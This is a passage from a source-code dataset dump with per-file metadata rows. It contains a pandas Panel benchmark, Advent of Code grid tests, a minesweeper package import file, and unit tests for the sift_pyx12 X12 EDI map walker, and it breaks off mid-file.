def time_panel_from_dict_all_different_indexes(self):
Panel.from_dict(self.data_frames)
class panel_from_dict_equiv_indexes(object):
goal_time = 0.2
def setup(self):
self.data_frames = {}
for x in range(100):
self.dr = np.asarray(DatetimeIndex(start=datetime(1990, 1, 1), end=datetime(2012, 1, 1), freq=datetools.Day(1)))
self.df = DataFrame({'a': ([0] * len(self.dr)), 'b': ([1] * len(self.dr)), 'c': ([2] * len(self.dr)), }, index=self.dr)
self.data_frames[x] = self.df
def time_panel_from_dict_equiv_indexes(self):
Panel.from_dict(self.data_frames)
class panel_from_dict_same_index(object):
goal_time = 0.2
def setup(self):
self.dr = np.asarray(DatetimeIndex(start=datetime(1990, 1, 1), end=datetime(2012, 1, 1), freq=datetools.Day(1)))
self.data_frames = {}
for x in range(100):
self.df = DataFrame({'a': ([0] * len(self.dr)), 'b': ([1] * len(self.dr)), 'c': ([2] * len(self.dr)), }, index=self.dr)
self.data_frames[x] = self.df
def time_panel_from_dict_same_index(self):
Panel.from_dict(self.data_frames)
class panel_from_dict_two_different_indexes(object):
goal_time = 0.2
def setup(self):
self.data_frames = {}
self.start = datetime(1990, 1, 1)
self.end = datetime(2012, 1, 1)
for x in range(100):
if (x == 50):
self.end += timedelta(days=1)
self.dr = np.asarray(date_range(self.start, self.end))
self.df = DataFrame({'a': ([0] * len(self.dr)), 'b': ([1] * len(self.dr)), 'c': ([2] * len(self.dr)), }, index=self.dr)
self.data_frames[x] = self.df
def time_panel_from_dict_two_different_indexes(self):
Panel.from_dict(self.data_frames)
| 37.109375
| 131
| 0.590737
| 356
| 2,375
| 3.761236
| 0.151685
| 0.089619
| 0.116505
| 0.053771
| 0.974608
| 0.953697
| 0.935026
| 0.935026
| 0.935026
| 0.843913
| 0
| 0.047778
| 0.242105
| 2,375
| 64
| 132
| 37.109375
| 0.696111
| 0
| 0
| 0.791667
| 0
| 0
| 0.005051
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.020833
| 0
| 0.354167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9beb2c1f2392c8473194753b1eeb383bc5075390
| 1,995
|
py
|
Python
|
tests/test_grid.py
|
elizabrock/adventofcode
|
542d86df55696e60b9044a468d9231650b93594c
|
[
"MIT"
] | null | null | null |
tests/test_grid.py
|
elizabrock/adventofcode
|
542d86df55696e60b9044a468d9231650b93594c
|
[
"MIT"
] | null | null | null |
tests/test_grid.py
|
elizabrock/adventofcode
|
542d86df55696e60b9044a468d9231650b93594c
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from day6 import Grid
class TestGrid(TestCase):
def test_lights_start_out_off(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
def test_toggle_one_light(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
grid.toggle(0, 0, 0, 0)
self.assertEqual(1, grid.lights_on_count())
grid.toggle(0, 0, 0, 0)
self.assertEqual(0, grid.lights_on_count())
def test_toggle_multiple_light(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
grid.toggle(0, 0, 4, 4)
self.assertEqual(25, grid.lights_on_count())
grid.toggle(0, 0, 2, 2)
self.assertEqual(16, grid.lights_on_count())
def test_turn_on_one_light(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
grid.turn_on(0, 0, 0, 0)
self.assertEqual(1, grid.lights_on_count())
grid.turn_on(0, 0, 0, 0)
self.assertEqual(1, grid.lights_on_count())
def test_turn_on_multiple_light(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
grid.turn_on(0, 0, 0, 0)
self.assertEqual(1, grid.lights_on_count())
grid.turn_on(0, 0, 4, 4)
self.assertEqual(25, grid.lights_on_count())
def test_turn_off_one_light(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
grid.turn_on(0, 0, 0, 0)
self.assertEqual(1, grid.lights_on_count())
grid.turn_off(0, 0, 0, 0)
self.assertEqual(0, grid.lights_on_count())
grid.turn_off(0, 0, 0, 0)
self.assertEqual(0, grid.lights_on_count())
def test_turn_off_multiple_light(self):
grid = Grid()
self.assertEqual(0, grid.lights_on_count())
grid.turn_on(0, 0, 4, 4)
self.assertEqual(25, grid.lights_on_count())
grid.turn_off(0, 0, 1, 1)
self.assertEqual(21, grid.lights_on_count())
| 35
| 52
| 0.622055
| 299
| 1,995
| 3.899666
| 0.100334
| 0.049743
| 0.205832
| 0.291595
| 0.876501
| 0.876501
| 0.876501
| 0.876501
| 0.814751
| 0.807033
| 0
| 0.051862
| 0.246115
| 1,995
| 57
| 53
| 35
| 0.723404
| 0
| 0
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.14
| false
| 0
| 0.04
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
50512dbe4c53402d2adeefe63cc029540803985a
| 98
|
py
|
Python
|
minesweeper/agents/__init__.py
|
MathisFederico/Minesweeper
|
b66b41066e325813b24497d2caca0a11c048e18b
|
[
"MIT"
] | 1
|
2020-12-23T11:52:40.000Z
|
2020-12-23T11:52:40.000Z
|
minesweeper/agents/__init__.py
|
MathisFederico/Minesweeper
|
b66b41066e325813b24497d2caca0a11c048e18b
|
[
"MIT"
] | null | null | null |
minesweeper/agents/__init__.py
|
MathisFederico/Minesweeper
|
b66b41066e325813b24497d2caca0a11c048e18b
|
[
"MIT"
] | null | null | null |
from minesweeper.agents.random import RandomAgent
from minesweeper.agents.human import HumanAgent
| 32.666667
| 49
| 0.877551
| 12
| 98
| 7.166667
| 0.666667
| 0.348837
| 0.488372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 50
| 49
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50564d9667feda8f80eb1aa984752c032acd1f00
| 36,783
|
py
|
Python
|
sift_pyx12/test/test_map_walker.py
|
sifthealthcare/sift-pyx12
|
97b38fd8b681f149570ac9d5cae0fe868a7722f2
|
[
"BSD-3-Clause"
] | null | null | null |
sift_pyx12/test/test_map_walker.py
|
sifthealthcare/sift-pyx12
|
97b38fd8b681f149570ac9d5cae0fe868a7722f2
|
[
"BSD-3-Clause"
] | 2
|
2021-11-12T18:35:11.000Z
|
2021-11-12T18:35:31.000Z
|
sift_pyx12/test/test_map_walker.py
|
sifthealthcare/sift-pyx12
|
97b38fd8b681f149570ac9d5cae0fe868a7722f2
|
[
"BSD-3-Clause"
] | null | null | null |
import unittest
import sift_pyx12.error_handler
from sift_pyx12.map_walker import walk_tree, get_id_list, traverse_path, pop_to_parent_loop
import sift_pyx12.map_if
import sift_pyx12.params
import sift_pyx12.path
import sift_pyx12.segment
class Explicit_Loops(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
self.errh = sift_pyx12.error_handler.errh_null()
#self.logger = logging.getLogger('sift_pyx12')
#self.logger.setLevel(logging.DEBUG)
#formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
#hdlr = logging.FileHandler('debug.txt')
#hdlr.setFormatter(formatter)
#self.logger.addHandler(hdlr)
def test_ISA_to_GS(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/ISA')
self.assertNotEqual(node, None, 'node not found')
seg_data = sift_pyx12.segment.Segment('GS*HC', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed')
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['GS_LOOP'])
def test_GS_to_ST(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/GS')
seg_data = sift_pyx12.segment.Segment('ST*837', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['ST_LOOP'])
def test_SE_to_ST(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/SE')
self.assertNotEqual(node, None)
seg_data = sift_pyx12.segment.Segment('ST*837', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['ST_LOOP'])
self.assertEqual(get_id_list(push), ['ST_LOOP'])
def test_SE_to_GE(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/SE')
seg_data = sift_pyx12.segment.Segment('GE*1', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['ST_LOOP'])
self.assertEqual(get_id_list(push), [])
def test_GE_to_GS(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/GE')
seg_data = sift_pyx12.segment.Segment('GS*HC', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['GS_LOOP'])
self.assertEqual(get_id_list(push), ['GS_LOOP'])
def test_GE_to_IEA(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/GE')
self.assertEqual('GE', node.id)
seg_data = sift_pyx12.segment.Segment('IEA*1', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['GS_LOOP'])
self.assertEqual(get_id_list(push), [])
def test_IEA_to_ISA(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/IEA')
self.assertEqual('IEA', node.id)
seg_data = sift_pyx12.segment.Segment('ISA*00', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['ISA_LOOP'])
self.assertEqual(get_id_list(push), ['ISA_LOOP'])
def test_ST_to_BHT_fail(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/ST')
seg_data = sift_pyx12.segment.Segment('ZZZ*0019', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(node, None)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def tearDown(self):
del self.errh
del self.map
del self.walker
def test_GS_to_ST_277(self):
map_file = '277.5010.X214.xml'
walker = walk_tree()
param = sift_pyx12.params.params()
map = sift_pyx12.map_if.load_map_file(map_file, param)
errh = sift_pyx12.error_handler.errh_null()
errh.reset()
node = map.getnodebypath('/ISA_LOOP/GS_LOOP/GS')
seg_data = sift_pyx12.segment.Segment('ST*277*0001*005010X214', '~', '*', ':')
(node, pop, push) = walker.walk(
node, seg_data, errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['ST_LOOP'])
class Implicit_Loops(unittest.TestCase):
"""
TA1 segment
child loop
next sibling loop
end loop - goto parent loop
start at loop node
start at segment node
start at element/composite node?
MATCH HL segment
FAIL - loop repeat exceeds max count
OK - loop repeat does not exceed max count
"""
def setUp(self):
self.walker = walk_tree()
self.param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file(
'837.4010.X098.A1.xml', self.param)
self.errh = sift_pyx12.error_handler.errh_null()
def test_ST_to_BHT(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/ST')
seg_data = sift_pyx12.segment.Segment('BHT*0019', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['HEADER'])
def xtest_repeat_loop_with_one_segment(self):
cmap = sift_pyx12.map_if.load_map_file('841.4010.XXXC.xml', self.param)
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100/SPI')
self.assertNotEqual(node, None, 'Node not found')
start_node = node
#node.cur_count = 1
self.walker.setCountState({node.x12path: 1})
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('SPI*00', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed')
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2100'])
self.assertEqual(get_id_list(push), ['2100'])
self.assertEqual(traverse_path(start_node, pop, push), pop_to_parent_loop(node).get_path())
def test_repeat_loop_with_one_segment_EQ(self):
#errh = sift_pyx12.error_handler.errh_null()
cmap = sift_pyx12.map_if.load_map_file('270.4010.X092.A1.xml', self.param)
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2000C/2100C/2110C/EQ')
start_node = node
self.assertNotEqual(node, None, 'Node not found')
#node.cur_count = 1
self.walker.setCountState({node.x12path: 1})
seg_data = sift_pyx12.segment.Segment('EQ*30**CHD', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed')
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2110C'])
self.assertEqual(get_id_list(push), ['2110C'])
self.assertEqual(traverse_path(start_node, pop, push),
pop_to_parent_loop(node).get_path())
def test_loop_required_fail1(self):
"""
Test for skipped /2000A/2010AA/NM1 segment - first segment of loop
"""
self.errh.reset()
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/HL')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
seg_data = sift_pyx12.segment.Segment('HL*1**20*1~', '~', '*', ':')
result = node.is_valid(seg_data, self.errh)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.walker.setCountState({node.x12path: 1})
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('HL*2*1*22*0~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
#result = node.is_valid(seg_data, self.errh)
#self.assertFalse(result)
self.assertEqual(self.errh.err_cde, '3', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2000B'])
def test_match_loop_by_hl_ok(self):
"""
MATCH loop by HL segment
"""
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
seg_data = sift_pyx12.segment.Segment('HL*1**20*1~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
result = node.is_valid(seg_data, self.errh)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2000A'])
self.assertEqual(get_id_list(push), ['2000A'])
def test_loop_required_ok1(self):
"""
MATCH loop by first segment
Test for found /2000A/2010AA/NM1 segment
"""
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
seg_data = sift_pyx12.segment.Segment('HL*1**20*1~', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
result = node.is_valid(seg_data, self.errh)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2000A'])
self.assertEqual(get_id_list(push), ['2000A'])
seg_data = sift_pyx12.segment.Segment(
'NM1*85*2*Provider Name*****XX*24423423~', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
result = node.is_valid(seg_data, self.errh)
self.assertTrue(result)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2010AA'])
def test_mult_matching_subloops_ok(self):
"""
Test for match of 820 Individual Remittance Loop
"""
cmap = sift_pyx12.map_if.load_map_file('820.5010.X218.xml', self.param)
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
#node.cur_count = 1
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000A')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
#node.cur_count = 1
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
#node.cur_count = 1
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B/N1')
self.assertNotEqual(node, None)
start_node = node
self.assertEqual(node.base_name, 'segment')
#node.cur_count = 1
seg_data = sift_pyx12.segment.Segment(
'ENT*1*2J*EI*99998707~', '~', '*', ':')
self.errh.reset()
#print node.get_path()
self.walker.setCountState({
'/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER': 1,
'/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000A': 1,
'/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B': 1,
'/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/1000B/N1': 1,
})
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
#print node.get_path()
self.assertEqual(get_id_list(pop), ['1000B', 'HEADER'])
self.assertEqual(get_id_list(push), ['TABLE2AREA3', '2000B'])
self.assertEqual(traverse_path(start_node, pop, push),
pop_to_parent_loop(node).get_path())
def test_837i_2420a(self):
walker = walk_tree()
param = sift_pyx12.params.params()
cmap = sift_pyx12.map_if.load_map_file(
'837Q3.I.5010.X223.A1.xml', self.param)
errh = sift_pyx12.error_handler.errh_null()
path = '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400/DTP'
node = cmap.getnodebypath(path)
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
seg_data = sift_pyx12.segment.Segment(
'NM1*72*1*TEST*BAR****XX*9999974756~', '~', '*', ':')
(node, pop, push) = walker.walk(node, seg_data, errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed to find %s' % (seg_data))
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(errh.err_cde, None, errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2420A'])
def test_999_2110_IK4(self):
walker = walk_tree()
param = sift_pyx12.params.params()
cmap = sift_pyx12.map_if.load_map_file('999.5010.xml', self.param)
errh = sift_pyx12.error_handler.errh_null()
path = '/ISA_LOOP/GS_LOOP/ST_LOOP/HEADER/2000/2100/IK3'
node = cmap.getnodebypath(path)
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
#node.cur_count = 1
walker.setCountState({node.parent.x12path: 1, node.x12path: 1})
seg_data = sift_pyx12.segment.Segment('IK4*3*116*7*88888-8888~', '~', '*', ':')
errh.reset()
(node, pop, push) = walker.walk(node, seg_data, errh, seg_count=8, cur_line=7, ls_id=None)
self.assertNotEqual(node, None, 'walker failed to find %s' % (seg_data))
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(errh.err_cde, None, errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2110'])
def tearDown(self):
del self.errh
del self.map
del self.walker
class SegmentWalk(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
self.param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file(
'837.4010.X098.A1.xml', self.param)
self.errh = sift_pyx12.error_handler.errh_null()
def test_match_regular_segment(self):
self.errh.reset()
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2010AB/NM1')
seg_data = sift_pyx12.segment.Segment('N4*Billings*MT*56123', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_match_ID_segment1(self):
self.errh.reset()
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/CLM')
seg_data = sift_pyx12.segment.Segment('DTP*454*D8*20040101', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_segment_required_fail1(self):
"""
Skipped required segment
"""
self.errh.reset()
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2010AA/NM1')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
seg_data = sift_pyx12.segment.Segment('N4*NOWHERE*MA*30001~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, '3', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_found_unused_segment1(self):
self.errh.reset()
cmap = sift_pyx12.map_if.load_map_file('comp_test.xml', self.param)
node = cmap.getnodebypath('/TST')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
#node.cur_count = 1
self.walker.setCountState({node.x12path: 1})
seg_data = sift_pyx12.segment.Segment('UNU*AA*B~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
#result = node.is_valid(comp, self.errh)
#self.assertTrue(result)
self.assertEqual(self.errh.err_cde, '2', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def tearDown(self):
del self.errh
del self.map
del self.walker
class SegmentWalk278(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
self.param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file(
'278.4010.X094.A1.xml', self.param)
self.errh = sift_pyx12.error_handler.errh_null()
def test_match_regular_segment(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2000C/2000E/2000F/DTP')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
seg_data = sift_pyx12.segment.Segment('HI*BO:T1017::::382', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(
node, None, 'Segment not found: %s' % (seg_data.format()))
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
class Segment_ID_Checks(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
self.errh = sift_pyx12.error_handler.errh_null()
self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/ST')
def test_segment_id_short(self):
self.errh.reset()
node = self.node
seg_data = sift_pyx12.segment.Segment('Z*0019', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(node, None)
self.assertEqual(self.errh.err_cde, '1', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_segment_id_long(self):
self.errh.reset()
node = self.node
seg_data = sift_pyx12.segment.Segment('ZZZZ*0019', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(node, None)
self.assertEqual(self.errh.err_cde, '1', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
class Counting(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('270.4010.X092.A1.xml', param)
self.errh = sift_pyx12.error_handler.errh_null()
#self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/N4')
self.node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/NM1')
#self.node.parent.cur_count = 1 # Loop 2100B
self.countState = {
self.node.parent.x12path: 1,
self.node.x12path: 1,
}
#self.node.cur_count = 1
self.node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/PER')
self.assertNotEqual(self.node, None)
self.countState[self.node.x12path] = 1
def test_count_ok1(self):
self.errh.reset()
node = self.node
#node.cur_count = 1
self.walker.setCountState(self.countState)
seg_data = sift_pyx12.segment.Segment('PER*IC*Name1*EM*dev@null.com~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
def test_count_ok2(self):
self.errh.reset()
node = self.node
#node.cur_count = 2
countState = {
self.node.parent.x12path: 1,
self.node.x12path: 2,
}
self.walker.setCountState(countState)
seg_data = sift_pyx12.segment.Segment('PER*IC*Name1*EM*dev@null.com~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
def test_count_fail1(self):
self.errh.reset()
node = self.node
#node.cur_count = 3
self.walker.setCountState(self.countState)
#self.walker.counter.increment(node.x12path)
#self.walker.counter.increment(node.x12path)
self.walker.counter.setCount(node.x12path, 3)
seg_data = sift_pyx12.segment.Segment('PER*IC*Name1*EM*dev@null.com~', '~', '*', ':')
self.assertNotEqual(node, None, 'Node not found')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, '5', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
class LoopCounting(unittest.TestCase):
def setUp(self):
initialCounts = {}
self.walker = walk_tree(initialCounts)
param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
self.errh = sift_pyx12.error_handler.errh_null()
def test_max_loop_count_ok1(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400')
self.assertNotEqual(node, None, 'Node not found')
self.walker.setCountState({
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400': 48,
})
#node.cur_count = 48
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('LX*51~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2400'])
self.assertEqual(get_id_list(push), ['2400'])
def test_max_loop_count_fail1(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400')
self.assertNotEqual(node, None, 'Node not found')
self.walker.setCountState({
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400': 50,
})
#node.cur_count = 50
seg_data = sift_pyx12.segment.Segment('LX*51~', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, '4', self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2400'])
self.assertEqual(get_id_list(push), ['2400'])
class CountOrdinal(unittest.TestCase):
def setUp(self):
initialCounts = {
